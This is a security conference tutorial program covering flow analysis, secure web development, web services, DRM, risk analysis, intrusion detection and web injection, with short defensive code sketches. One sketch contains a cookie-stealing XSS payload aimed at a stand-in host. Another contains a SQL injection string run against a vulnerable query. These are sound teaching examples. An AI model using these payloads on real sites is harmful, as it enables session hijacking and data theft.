Tutorials

CANCELLED: Tutorial T4 – Acquisition and Analysis of Large Scale Network Data V.4

Dr. John McHugh, Dalhousie University

Tuesday, December 9th, Full Day

Detecting malicious activity in network traffic is greatly complicated by the large amounts of noise, junk, and other questionable traffic that can serve as cover for these activities. With the advent of low cost mass storage devices and inexpensive computer memory, it has become possible to collect and analyze large amounts of network data covering periods of weeks, months, or even years. This tutorial will present techniques for collecting and analyzing such data, whether obtained as network flow data from routers and other flow collectors, derived from packet header data or packet captures such as those produced by TCPDump, or constructed from application logs. This version of the course will consist of a half day of lecture introducing the core tools, followed by a half day of hands-on analysis using a data set to be provided.

Because of the quantity of the data involved, we develop techniques, based on filtering of the recorded data stream, for identifying groups of source or destination addresses of interest and extracting the raw data associated with them. The address groups can be represented as sets or multisets (bags) and used to refine the analysis. For example, the set of addresses within a local network that appear as source addresses for outgoing traffic in a given time interval approximates the currently active population of the local network. This set can be used to partition incoming traffic into traffic that might be legitimate and traffic that probably is not, since it is not addressed to active systems. Further analysis of the questionable traffic develops smaller partitions that can be identified as scanners, DDoS backscatter, etc., based on flag combinations and packet statistics. Traffic involving hosts whose source addresses appear in both partitions can be examined for evidence that the corresponding destinations in the active set have been compromised. The analysis can also be used to characterize normal traffic for a customer network and to serve as a basis for identifying anomalous traffic that may warrant further examination.
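
To make the set-based partitioning concrete, here is a small self-contained Python sketch. The course itself uses the SiLK toolset over real flow repositories; the toy record layout, addresses, and flag strings below are illustrative assumptions only.

    # Toy flow records; real analyses use SiLK tools over much larger data.
    outgoing = [  # flows sourced inside the local network during the interval
        {"sip": "10.0.0.5", "dip": "192.0.2.9", "flags": "SA"},
        {"sip": "10.0.0.7", "dip": "198.51.100.2", "flags": "S"},
    ]
    incoming = [  # flows destined to the local network
        {"sip": "203.0.113.4", "dip": "10.0.0.5", "flags": "S"},    # active dest
        {"sip": "203.0.113.9", "dip": "10.0.0.99", "flags": "S"},   # dark space
        {"sip": "198.51.100.2", "dip": "10.0.0.42", "flags": "SA"}, # backscatter?
    ]

    # Active set: internal addresses seen as sources of outgoing traffic.
    active = {rec["sip"] for rec in outgoing}

    # Partition incoming traffic: flows to active hosts might be legitimate;
    # flows to inactive (dark) space probably are not.
    maybe_legit = [r for r in incoming if r["dip"] in active]
    questionable = [r for r in incoming if r["dip"] not in active]

    # Crude flag-based refinement of the questionable partition: SYN-only
    # flows suggest scanning; SYN/ACK or RST flows suggest DDoS backscatter.
    scans = [r for r in questionable if r["flags"] == "S"]
    backscatter = [r for r in questionable if r["flags"] in ("SA", "R", "RA")]

    print(f"{len(active)} active hosts, {len(maybe_legit)} maybe-legitimate flows,")
    print(f"{len(scans)} scan-like and {len(backscatter)} backscatter-like flows")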

Outline

  1. Introduction
  2. Overview of the toolset and core tools
  3. Guided examples
  4. Directed Studies
  5. Outbrief

Prerequisites

General familiarity with IP network protocols. Elementary familiarity with simple statistical measures. The tutorial will consist of morning lectures followed by a guided "hands-on" session in the afternoon.

We will have a limited number of workstations with the necessary tools and data installed; however, students are encouraged to bring their own laptops if possible, as maximum benefit will be obtained by doing the exercises on an individual basis. The tools can be loaded from http://tools.netsa.cert.org/silk/ and will work on most varieties of Unix, including Linux, Mac OS X, Solaris, OpenBSD, etc. They should work on a VMware or similar Unix installation under Windows, but do not currently run as native Windows applications. Students registering for the course are encouraged to load, build, and test the tools prior to the tutorial. The data to be used for the exercises will be available for download by mid-November, as well as on USB disks and DVDs at the tutorial. We anticipate using 5-10GB of data. Past experience shows that fast USB drives provide adequate performance in most cases if laptop disk space is a problem. The instructor will be available to help with any installation problems the evening before the tutorial and can be contacted by registered attendees for help prior to that time.

About the Instructor

Dr. John McHugh is the Canada Research Chair in Privacy and Security at Dalhousie University in Halifax, NS. His research interests include network data analysis, visualization of network behaviors, and related aspects of computer security. He regularly teaches a semester course in network data analysis and intrusion detection. He is one of the few external users and developers of the SiLK analysis suite for NetFlow analysis and has published extensively in the field. Prior to joining Dalhousie, he was a senior member of the technical staff with the CERT Situational Awareness Team, where he did research in survivability, network security, and intrusion detection. He was a professor and former chairman of the Computer Science Department at Portland State University in Portland, Oregon. His research interests there included computer security, software engineering, and programming languages. He has previously taught at the University of North Carolina and at Duke University. He was the architect of the Gypsy code optimizer and the Gypsy Covert Channel Analysis tool. Dr. McHugh received his PhD degree in computer science from the University of Texas at Austin. He has an MS degree in computer science from the University of Maryland and a BS degree in physics from Duke University.


Tutorial M2 – WebAppSec.php: Developing Secure Web Applications

Mr. Robert H'obbes' Zakon, Zakon Group LLC

Monday, December 8th, Full Day

Web applications are the new frontier of widespread security breaches. This tutorial will guide you through development practices that ensure the security and integrity of your application, in turn protecting user data and the infrastructure the application runs on. Several attack types will be reviewed, along with how proper development practices can mitigate their damage. Although the tutorial targets the security of PHP-based applications, much of the content is applicable to other programming languages as well.
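
As a small taste of the practices covered, the sketch below shows output escaping, the core defense against cross-site scripting. The tutorial's own examples are PHP-based; this Python stand-in (using the standard html module) is an illustrative assumption, not course material.

    import html

    def render_comment(user_input: str) -> str:
        # Never interpolate raw user input into HTML. Escaping converts
        # markup-significant characters so the browser treats them as text.
        return "<p>" + html.escape(user_input, quote=True) + "</p>"

    hostile = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    print(render_comment(hostile))
    # The &lt;script&gt;... output renders as inert text instead of executing.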

Outline

  1. Overview & Scope
  2. Secure Coding Practices
  3. Attack Types & Prevention
  4. Web 2.0, AJAX
  5. Grand Finale

Prerequisites

A good understanding of web programming, preferably with some database programming experience. Familiarity with PHP, although not required, may be useful, as the examples covered will be PHP-based.

About the Instructor

Mr. Robert Zakon is a technology consultant and developer who has been programming web applications since the Web's infancy, over 15 years ago. In addition to developing web applications for web sites receiving millions of daily hits, he works with organizations in an interim CTO capacity, and advises corporations, non-profits and government agencies on technology, information, and security architecture and infrastructure. Robert is a former Principal Engineer with MITRE's Information Security Center, CTO of an Internet consumer portal and application service provider, and Director of a university research lab. He is a Senior Member of the IEEE, and holds BS & MS degrees from Case Western Reserve University in Computer Engineering & Science with concentrations in Philosophy & Psychology. His interests are diverse and can be explored at www.Zakon.org.


Tutorial T5 – Web Services Security, Techniques and Challenges

Dr. Anoop Singhal, NIST
Mr. Gunnar Peterson, Arctec Group

Tuesday, December 9th, Full Day

The advance of Web services technologies promises to have far-reaching effects on the Internet and enterprise networks. Web services based on the eXtensible Markup Language (XML), the Simple Object Access Protocol (SOAP), and related open standards, and deployed in Service Oriented Architectures (SOA), allow data and applications to interact without human intervention through dynamic and ad hoc connections. Web services technology can be implemented in a wide variety of architectures, can co-exist with other technologies and software design approaches, and can be adopted in an evolutionary manner without requiring major transformations to legacy applications and databases.

The security challenges presented by the Web services approach are formidable and unavoidable. Many of the features that make Web services attractive, including greater accessibility of data, dynamic application-to-application connections, and relative autonomy (lack of human intervention) are at odds with traditional security models and controls. Simply put – when you empower developers, you empower attackers. Difficult issues and unsolved problems exist, such as the following:

  1. Confidentiality and integrity of data transmitted via Web services protocols in service-to-service transactions, including data that transits intermediary (pass-through) services.
  2. Functional integrity of the Web services themselves, requiring both establishment in advance of the trustworthiness of services to be included in service orchestrations or choreographies, and the establishment of trust between services on a per transaction basis.
  3. Availability in the face of denial of service attacks that exploit vulnerabilities unique to Web service technologies, especially those targeting core services, such as the discovery service, on which other services rely.

Perimeter-based network security technologies (e.g., firewalls, intrusion detection) are inadequate to protect SOAs for the following reasons:

  • SOAs are dynamic, and can seldom be fully constrained to the physical boundaries of a single network
  • The SOAP protocol is transmitted over HTTP, which is allowed to flow without restriction through most firewalls. Moreover, TLS, which is used to authenticate and encrypt Web-based transactions, is not a silver bullet for protecting SOAP messages because it is designed to operate between two endpoints. TLS cannot accommodate Web services' inherent ability to forward messages to multiple other Web services simultaneously.

The SOA processing model requires the ability to secure SOAP messages and XML documents as they are forwarded along potentially long and complex chains of consumer, provider, and intermediary services. The nature of Web services processing makes those services subject to unique attacks, as well as variations on familiar attacks targeting Web servers.
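
The contrast with transport security is easy to demonstrate: TLS protection ends at each hop, while protection carried inside the message survives forwarding. The Python sketch below uses an HMAC over the message body as a conceptual stand-in for WS-Security's XML Signature mechanism; the real standards sign XML structures with public-key cryptography rather than hashing raw strings under a shared key.

    import hmac, hashlib

    SHARED_KEY = b"demo-key-known-to-requester-and-final-service"  # illustrative only

    def sign_message(body: str) -> dict:
        # Protection travels inside the message, so it survives any number
        # of intermediary hops, unlike TLS, which terminates at each endpoint.
        tag = hmac.new(SHARED_KEY, body.encode(), hashlib.sha256).hexdigest()
        return {"body": body, "signature": tag}

    def verify_message(msg: dict) -> bool:
        expected = hmac.new(SHARED_KEY, msg["body"].encode(), hashlib.sha256).hexdigest()
        return hmac.compare_digest(expected, msg["signature"])

    msg = sign_message("<getQuote symbol='IBM'/>")
    # ... routed through intermediaries, possibly over several separate TLS hops ...
    assert verify_message(msg)          # intact end to end
    msg["body"] = "<getQuote symbol='EVIL'/>"
    assert not verify_message(msg)      # tampering by any hop is detected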

Ensuring the security of Web services involves implementing new security models based on authentication, authorization, confidentiality, and integrity mechanisms. This tutorial will discuss how to implement those security mechanisms in Web services. It will also discuss how to make Web services and portal applications robust against the attacks to which they are subject. The following is a summary of some of the topics that will be discussed:

  1. WS-Security
  2. XML Security using XML Encryption and XML Signatures (see the sketch after this list)
  3. Threats facing Web Services
  4. Policy and Access control using WS-Policy, XACML and SAML
  5. Security Management using WS-Trust
  6. PKI for Web Services using XKMS
  7. Secure Implementation Tools and Techniques
  8. Recommendations for Web Services Security
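
As a hint of what topic 2 involves, element-level encryption protects only the sensitive parts of a document, leaving routing information readable by intermediaries. The sketch below conveys the idea with Python's xml.etree and the third-party cryptography package's Fernet recipe as stand-ins; real XML Encryption wraps ciphertext in the W3C EncryptedData structure rather than this ad hoc marker.

    import xml.etree.ElementTree as ET
    from cryptography.fernet import Fernet  # pip install cryptography

    key = Fernet.generate_key()
    f = Fernet(key)

    doc = ET.fromstring(
        "<order><routing>warehouse-7</routing>"
        "<card>4111111111111111</card></order>")

    # Encrypt only the sensitive element; <routing> stays readable so
    # intermediary services can still dispatch the message.
    card = doc.find("card")
    card.text = f.encrypt(card.text.encode()).decode()
    card.set("enc", "true")  # ad hoc marker; XML Encryption uses EncryptedData

    print(ET.tostring(doc, encoding="unicode"))
    # Only the final recipient, holding the key, recovers the card number:
    assert f.decrypt(card.text.encode()).decode() == "4111111111111111"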

Prerequisites

Participants should be familiar with concepts of network security and Web applications.

About the Instructors

Dr. Anoop Singhal is currently a Computer Scientist in the Computer Security Division at NIST. He has several years of research experience at George Mason University, AT&T Labs, and Bell Labs. As a Distinguished Member of Technical Staff at Bell Labs, he led several software projects in the areas of databases, Web services, and network management. He is a senior member of the IEEE and has published more than 20 papers in leading conferences and journals. He received his Ph.D. in Computer Science from Ohio State University, Columbus, Ohio, in 1985. He has given talks on Web services security at conferences such as ACSAC 2006 and RSA 2007.

Gunnar Peterson is a Managing Principal at Arctec Group. He is focused on distributed systems security for large mission-critical financial, financial exchange, healthcare, manufacturing, and insurance systems, as well as emerging startups. Mr. Peterson is an internationally recognized software security expert who is frequently published, an Associate Editor for IEEE Security & Privacy Journal on Building Security In, an Associate Editor for Information Security Bulletin, a contributor to the SEI and DHS Build Security In portal on software security, and an in-demand speaker at security conferences. He maintains the 1 Raindrop blog, with loosely coupled thoughts on software, security, and the systems they run on, at http://1raindrop.typepad.com.


Tutorial M3 – Cryptographic Techniques for Digital Rights Management

Dr. Hongxia Jin, IBM Almaden Research Center
Mr. Jeffrey Lotspiech, Lotspiech.com LLC

Monday, December 8th, Full Day

Today we live in a digital world. The advent of digital technologies has made the creation and manipulation of multimedia content simpler, offering consumers higher quality and far more convenience; for example, digital technologies allow one to make perfect copies. Furthermore, the rapid advance of network technologies, cheaper storage, and larger bandwidth have enabled new business models for electronically distributing and delivering multimedia content. However, unauthorized music and movie copying is taking a big bite out of the profits of the recording industry and beginning to affect the movie studios. The success of these emerging business models hinges on the ability to deliver content only to authorized customers. It is highly desirable to develop techniques that protect copyrighted material and defend against piracy.

Many digital rights management (DRM) systems have been developed. However, most DRM systems are overly restrictive of users' behavior. For example, users are not allowed to make any copies of their purchased content. It is not surprising that DRM receives bad press. A more balanced DRM system can be much more user friendly, and we believe cryptographic techniques can be used to enable such a balanced system.

Many cryptographic technologies have been developed for digital rights management. We cover basic key management and forensic techniques, renewability, content certificates, managed copies, drive authentication, and proactive renewal. Since the authors are the actual inventors of some of these core technologies, which are currently used in various industry standards, they will use their first-hand experience in the design, implementation, and deployment of DRM solutions for content protection to teach security researchers and practitioners how to design the various cryptographic techniques that can be used in building a balanced DRM system. For example, the "managed copies" technology enables users to import a purchased movie disc into their home entertainment network.
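
To give a flavor of the key management material, here is a toy Python sketch of the complete-subtree method, one of the subset-cover broadcast encryption schemes in the spirit of those underlying standards such as AACS: each device holds the keys on its leaf-to-root path in a binary tree, and the media key is encrypted under a cover of subtrees that excludes revoked devices. The eight-device tree, heap numbering, and XOR "cipher" are illustrative assumptions, not the deployed scheme.

    import os

    LEAVES = range(8, 16)                      # 8 devices, heap-numbered leaves
    node_key = {n: os.urandom(16) for n in range(1, 16)}

    def path(leaf):                            # keys a device holds: leaf-to-root
        nodes = []
        while leaf >= 1:
            nodes.append(leaf)
            leaf //= 2
        return nodes

    def xor(a, b):                             # toy cipher standing in for AES
        return bytes(x ^ y for x, y in zip(a, b))

    def cover(revoked):
        # Complete-subtree cover: maximal subtrees containing no revoked leaf.
        dirty = set().union(*(path(r) for r in revoked)) if revoked else set()
        out = []
        def walk(n):
            if n not in dirty:                 # clean subtree: one cover node
                out.append(n)
            elif n < 8:                        # tainted internal node: recurse
                walk(2 * n)
                walk(2 * n + 1)
            # a tainted leaf is a revoked device: excluded entirely
        walk(1)
        return out

    media_key = os.urandom(16)
    revoked = {9, 13}                          # e.g., keys extracted from clones
    header = {n: xor(media_key, node_key[n]) for n in cover(revoked)}

    def decrypt(leaf):                         # a device tries each key it holds
        for n in path(leaf):
            if n in header:
                return xor(header[n], node_key[n])
        return None                            # revoked: no usable header entry

    assert decrypt(8) == media_key and decrypt(13) is None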

Even though some of these technologies have received extensive study in the cryptography literature, bringing them to practice is a different matter. There are many issues, overlooked by the theoretical community, that must be addressed to bring the solutions to practice. This tutorial will cover both the state of the art and the state of the practice. It will also cover the gap between them and share the authors' experience of bringing theoretical solutions to practice.

The tutorial will also cover some attacks that have actually occurred in practice. For example, in a pirate decoder attack, the attackers break legitimate players, extract the secret keys, and build a clone player that can be used to rip the content. In an anonymous attack, the attackers can set up a server and serve clients with per-content keys on demand, or simply pirate and re-distribute the decrypted plain content. Practical forensic technologies that can detect the attackers behind these types of attacks will be discussed in depth in the tutorial.
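
A toy sketch of the forensic idea behind tracing an anonymous attack: each device receives one key variation per content segment, so the sequence of variations observed from a pirate server acts as a fingerprint of the coalition that supplied them. Real tracing codes give provable bounds on false accusation; the naive matching score below, with its small made-up parameters, is for illustration only.

    import random

    DEVICES, SEGMENTS, VARIATIONS = 20, 16, 4
    rng = random.Random(1)

    # Each device is assigned one key variation per content segment; the
    # assignment table doubles as a fingerprinting code.
    assignment = {d: [rng.randrange(VARIATIONS) for _ in range(SEGMENTS)]
                  for d in range(DEVICES)}

    # Anonymous attack: a pirate server re-serves per-segment keys taken
    # from the devices a coalition of attackers has compromised.
    coalition = [3, 11]
    pirated = [assignment[rng.choice(coalition)][s] for s in range(SEGMENTS)]

    # Forensics: score every device by how many observed variations it
    # could have supplied; colluders tend to score highest.
    scores = {d: sum(assignment[d][s] == pirated[s] for s in range(SEGMENTS))
              for d in range(DEVICES)}
    suspects = sorted(scores, key=scores.get, reverse=True)[:len(coalition)]
    print("highest-scoring devices:", suspects)  # typically the coalition members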

Since the authors have been involved in various content protection standards for many years, in this tutorial they will also show how to market the technologies to the various stakeholders: the television and film industry, the consumer electronics industry, and the information technology industry, with their quite different concerns. They will talk about the value of an open, standards-based licensing infrastructure in commercializing DRM technologies in a market, and some of the constraints and assurances that the various industries demand in these licenses. They will also discuss copyright law, not to give legal opinions, but to point out the curious situation where both DRM practitioners and DRM attackers cite copyright law to justify their actions.

Outline

  1. Introduction
  2. Key Management Approaches
  3. Broadcast Encryption
  4. Managed copies
  5. Key Conversion data
  6. Content Certificates
  7. Attacks (real and potential)
  8. Forensic Technologies
  9. Online features
  10. Copy control watermarking
  11. Drive authentication
  12. Future DRM research directions

Prerequisites

This tutorial is targeted at a beginner to intermediate audience; only a basic background in cryptography is assumed. No textbook is required. Attendees will walk away with an understanding of the various cryptographic technologies that can be used to build a customer-friendly DRM system. We will talk about different types of real and potential pirate attacks and the challenges associated with defending against each. Intermediate students will have the opportunity to get a summary of existing cryptographic techniques. Academic researchers will walk away with an understanding of the challenges in bringing theoretical solutions to practice, as well as potential new research directions that have been largely overlooked by academia in this area. Industrial practitioners will walk away with an understanding of real-world DRM systems, from design and legal issues to adoption.

About the Instructors

The authors are the actual inventors of some of the technologies deployed in multiple industry content protection standards. They bring expertise in mainstream content protection technologies and first-hand experience in the design, implementation, and deployment of key generation, management, and forensic systems in the real world.

Dr. Hongxia Jin obtained her Ph.D. degree in computer science from the Johns Hopkins University in 1999 and has worked as a Research Staff Member for IBM Research ever since. She is currently at the IBM Almaden Research Center, where she is the leading researcher working on key management, broadcast encryption, and traitor tracing technologies. The key management and forensic technologies she invented have been chosen as the core technologies by AACS, a new content protection industry standard for managing content stored on the next generation of pre-recorded and recorded optical media for consumer use with PCs and consumer electronic devices. She has filed about 20 patents in this area and has been awarded IBM's Outstanding Innovation Achievement Award. She has also published numerous papers, including invited book chapters and journal articles. She has been an invited speaker at multiple forums and universities, including Stanford, CMU, and the University of California at Berkeley.

Mr. Jeffrey Lotspiech was in at the inception of the technologies behind both the 4C and AACS industry standards. He is a named inventor on over 100 patents, including most of the key patents that protect content on physical media. He was the founder and first manager of the content protection group at the IBM Almaden Research Center. He retired from IBM in 2005 and now owns a content protection consulting company. He received his MS and BS in EE (Computer Science) from the Massachusetts Institute of Technology in 1972.


Tutorial T7 – Multi-perspective Application Security Risk Analysis: A Toolbox Approach

Mr. Sean Barnum, Cigital, Inc (Coordinator)

Jacob West, Fortify Software
Ray Lintner, IBM/Rational/Watchfire
Anthony Vicinelly, Application Security Inc.
Maj Michael Kleffman, USAF

Tuesday, December 9th, Half Day

NOTE: This session is tightly focused on the concept and execution of the approach discussed here rather than on specific products or services, and will avoid marketing language from any of the participants. Examples may draw on individual tools, but the focus will be on the example content and not on selling the tool.

Today, most people no longer need to be convinced of the criticality of application software security. The focus has moved from simple awareness to the identification and deployment of effective methods and tools to assess and mitigate application software security risk. Much has been said recently about the limitations of individual tools and the importance of a toolbox approach. Unfortunately, this discussion has been almost exclusively about the use of multiple tools within one individual perspective, such as static code analysis. This tutorial introduces the importance of a true toolbox approach, where sets of tools supporting differing perspectives of analysis are used together in an integrated fashion to yield a more comprehensive and actionable assessment of application security risk. Specifically, this tutorial will discuss a recommended baseline for multi-perspective analysis leveraging static source code analysis, application scanning & penetration testing, and application data security analysis tools, along with a real-world case study where this baseline is being leveraged today.

This session offers attendees an opportunity to learn about a best-practice approach to application security risk analysis from a unified team of the industry's leading practitioners in software security professional services (Cigital), static source code analysis (Fortify Software), web application scanning and penetration testing (IBM/Rational/Watchfire) and application data security analysis (Application Security, Inc.). In addition, they will hear from a representative of the USAF Application Software Assurance Center of Excellence (ASACoE) regarding the current use of this approach to assess Air Force software applications.

What will attendees gain from this session?

  • An understanding of the various potential perspectives of application security risk analysis
  • An understanding and appreciation of the value of integrated multi-perspective application security risk analysis
  • An understanding of the challenges and mechanisms for integrating multiple perspectives of application security risk analysis
  • An understanding of an actionable baseline approach for pursuing multi-perspective application security risk analysis
  • A confidence that multi-perspective application security risk analysis is real, practical and something that they should consider today

Outline

  1. Overview of Multi-perspective Application Security Risk Analysis: Cigital
  2. Role of static code analysis as an element of integrated multi-perspective risk analysis: Fortify Software
  3. Role of application scanning and penetration testing as an element of integrated multi-perspective risk analysis: IBM/Rational/Watchfire
  4. Role of application data security analysis as an element of integrated multi-perspective risk analysis: Application Security Inc.
  5. Real-world case study - Air Force Application Software Assurance Center of Excellence (ASACoE) Triage Risk Assessments: AF ASACoE
  6. Integrated example: Cigital
  7. Summary and Conclusion: Cigital

Prerequisites

Knowledge of software development technologies and processes. Familiarity with software risk analysis (including one or more of static code analysis, application scanning & penetration testing, or application data security analysis) would be useful.

About the Instructors

Mr. Sean Barnum is a Principal Consultant at Cigital and is technical lead for their federal services practice. He has over 23 years of experience in the software industry in the areas of development, software quality assurance, quality management, process architecture & improvement, knowledge management and security. He is a frequent contributor, speaker and trainer for regional and national software security and software quality publications, conferences & events. He is very active in the software assurance community and is involved in numerous knowledge standards-defining efforts including the Common Weakness Enumeration (CWE), the Common Attack Pattern Enumeration and Classification (CAPEC), and other elements of the Software Assurance Programs of the Department of Homeland Security and the Department of Defense. He is coauthor of the book "Software Security Engineering: A Guide for Project Managers", recently published by Addison-Wesley. He is also the lead technical subject matter expert for the Air Force Application Software Assurance Center of Excellence.

Mr. Jacob West manages Fortify Software's Security Research Group, which is responsible for building security knowledge into Fortify's products. Jacob brings expertise in numerous programming languages, frameworks and styles together with knowledge about how real-world systems can fail. In addition, he recently co-authored a book, "Secure Programming with Static Analysis," which was published in June 2007. Before joining Fortify, Jacob worked with Professor David Wagner, at the University of California at Berkeley, to develop MOPS (MOdel Checking Programs for Security properties), a static analysis tool used to discover security vulnerabilities in C programs. When he is away from the keyboard, Jacob spends time speaking at conferences and working with customers to advance their understanding of software security.

Mr. Ray Lintner is a senior technical resource for IBM/Rational/Watchfire in the field of application scanning and penetration testing.

Mr. Anthony Vicinelly is the Federal Systems Engineer for Application Security Inc, with responsibility for assisting with product evaluation, implementation, and integration of DbProtect, the company's industry-leading database security suite. He is also the technical resource for customers within the federal government, helping them achieve their individual database compliance and security goals. He brings with him experience as a Software Engineer for Raytheon Company, where he was responsible for the development, deployment, integration, and training of database and web-based applications. Mr. Vicinelly holds a B.S. in Computer Science from Westminster College.

Maj. Michael D. Kleffman is the Chief Technical Officer (CTO) for the Application Software Assurance Center of Excellence (ASACoE), 754ELSG at Maxwell AFB-Gunter Annex, AL. As CTO, he integrates software assurance tools and processes into A.F. software development and new acquisitions. Maj. Kleffman has also managed the Air Force Incident Response Team, which handled an average of 100 network intrusions per year. In addition, Capt Kleffman led a team of 20 analysts who monitored over 1000 real-time incidents per day. Maj. Kleffman has a BS from McMurry University and an MS in Information Assurance from the Air Force Institute of Technology.


Tutorial M1 – Intrusion Detection and Assessment through Mining and Learning Data Characteristics of Cyber Attacks and Normal Use Activities

Dr. Nong Ye, Arizona State University

Monday, December 8th, Full Day

Intrusion detection and assessment through signature recognition, anomaly detection, attack-norm separation, and event correlation all require learning the data characteristics of cyber attacks and normal use activities to enable the detection and correlation of cyber attack events. Data mining techniques are desirable for handling the large amounts of computer and network data collected under attack and normal use conditions in order to learn those data characteristics.

This tutorial will cover conventional and new applications of data mining and analysis techniques to learning data characteristics of cyber attacks and normal use activities in the form of mean shifts, density distribution changes, autocorrelation changes, wavelet signal changes, and classification models. These data characteristics have been shown to be useful in detecting many cyber attacks. Examples of such data characteristics associated with a variety of cyber attacks, such as rootkits, hardware and software keyloggers, buffer overflow, denial of service, ARP poisoning, and vulnerability scans, will be illustrated. This tutorial will also demonstrate how such attack and normal use data characteristics can be used to support the two conventional approaches to intrusion detection and assessment (signature recognition and anomaly detection) and a new approach called attack-norm separation. All of the covered data mining techniques allow the incremental learning and updating of attack and normal use data characteristics as new computer and network data are collected under new attack and normal use conditions.
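
To give a concrete feel for one such characteristic, the sketch below detects a mean shift in a monitored metric (say, packets per second) using a two-sided CUSUM test, a standard change-detection technique. The simulated series, drift, and threshold values are illustrative assumptions, not parameters from the tutorial.

    import random

    def cusum(series, mean, drift=0.5, threshold=8.0):
        """Two-sided CUSUM: return the index where a sustained mean shift is flagged."""
        hi = lo = 0.0
        for i, x in enumerate(series):
            hi = max(0.0, hi + (x - mean) - drift)   # accumulates upward shifts
            lo = max(0.0, lo + (mean - x) - drift)   # accumulates downward shifts
            if hi > threshold or lo > threshold:
                return i
        return None

    rng = random.Random(0)
    normal = [rng.gauss(10, 1) for _ in range(200)]  # normal-use profile
    attack = [rng.gauss(14, 1) for _ in range(50)]   # mean shifts under attack
    print("shift detected at index", cusum(normal + attack, mean=10))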

Outline

  1. Overview of intrusion detection and assessment approaches and their requirements for data characteristics of cyber attacks and normal use activities
  2. Computer and network data collected under attack and normal use conditions
  3. Density distribution and parameter estimation to discover the mean shift and distribution change characteristics
  4. Autocorrelation and time series analysis to discover the autocorrelation change characteristic
  5. Wavelet analysis to discover the data characteristic in time-frequency domain
  6. Classification models to discover target data patterns
  7. Use of data characteristics to support signature recognition, anomaly detection and attack-norm separation
  8. Mining and learning data characteristics for other applications

Prerequisites

General knowledge of cyber attacks, intrusion detection systems, and computer and network security.

About the Instructor

Dr. Nong Ye is a full professor at Arizona State University (ASU). She received her Ph.D. degree in Industrial Engineering from Purdue University, and her M.S. and B.S. degrees in Computer Science. Dr. Ye has taught numerous courses on cyber security and data mining at ASU, and has extensive research experience in intrusion detection and data mining. She has published 132 journal and conference papers as well as three books. Dr. Ye holds a patent for a method and algorithm for classifying data for intrusion detection and other data mining applications, and is the recipient of $9.2M in external research grants, awards, and contracts. More information is available at enpub.fulton.asu.edu/ye.


Tutorial T6 – Web Injection Attacks

Dr. V. N. Venkatakrishnan, University of Illinois at Chicago

Tuesday, December 9th, Half Day

In September 2007, MITRE Corp., a corporation that runs three federally funded research and development centers, reported that Cross-Site Scripting and SQL Injection Attacks (SQLIA) were the two most common forms of web injection attacks in 2006. MITRE Corp. came to this conclusion after studying a list of more than 20,000 Common Vulnerabilities and Exposures (CVE) entries for that year. This tutorial will focus on web injection attacks and defenses. We will concentrate on Cross-Site Scripting (XSS) attacks and SQL injection attacks, while briefly discussing other forms of injection attacks.

Our discussion of web injection attack defense will include both vulnerability identification approaches and attack prevention approaches. The former category consists of techniques that identify vulnerable locations in a web application that may lead to injection attacks. The latter category includes prevention mechanisms deployed around a (possibly vulnerable) application to prevent attacks. Some of the techniques covered will include static and dynamic analysis for vulnerability identification and taint-based runtime defenses for attack prevention.
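
The difference between a vulnerable construction and a prevented one is easy to show for SQL injection. The Python sketch below uses the standard sqlite3 module as a stand-in for whatever language and database a real application uses: splicing user input into the SQL text lets a quoted payload rewrite the query, while a parameterized query keeps the input as data.

    import sqlite3

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")

    attacker_input = "nobody' OR '1'='1"

    # Vulnerable: user input is spliced into the SQL text, so the quoted
    # payload changes the query's structure and dumps every row.
    vulnerable = db.execute(
        "SELECT * FROM users WHERE name = '" + attacker_input + "'").fetchall()

    # Prevented: a parameterized query sends the input as a value; the
    # payload is just an oddly named user that matches nothing.
    safe = db.execute(
        "SELECT * FROM users WHERE name = ?", (attacker_input,)).fetchall()

    print("vulnerable query returned:", vulnerable)   # [('alice', 's3cret')]
    print("parameterized query returned:", safe)      # []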

This tutorial is designed as an introductory survey of research on web injection attacks. It is targeted towards researchers, students, and practitioners wishing to develop solutions that build on the current state-of-the-art research in this area.

Outline

  1. Introduction
  2. Vulnerability identification mechanisms
  3. Attack Detection Mechanisms
  4. More advanced attacks
  5. Q & A

Prerequisites

A basic introduction to computer security is required.

About the Instructor

Dr. V. N. Venkatakrishnan is an Assistant Professor of Computer Science at the University of Illinois at Chicago. He is currently co-director of the Center for Research and Instruction in Technologies for Electronic Security (RITES) at UIC. His main research interests are in web security, mobile code security, and techniques for enforcing confidentiality and integrity policies in applications. He received his Ph.D. degree from Stony Brook University in 2004. He has won numerous awards, including the best paper award at ACSAC 2003.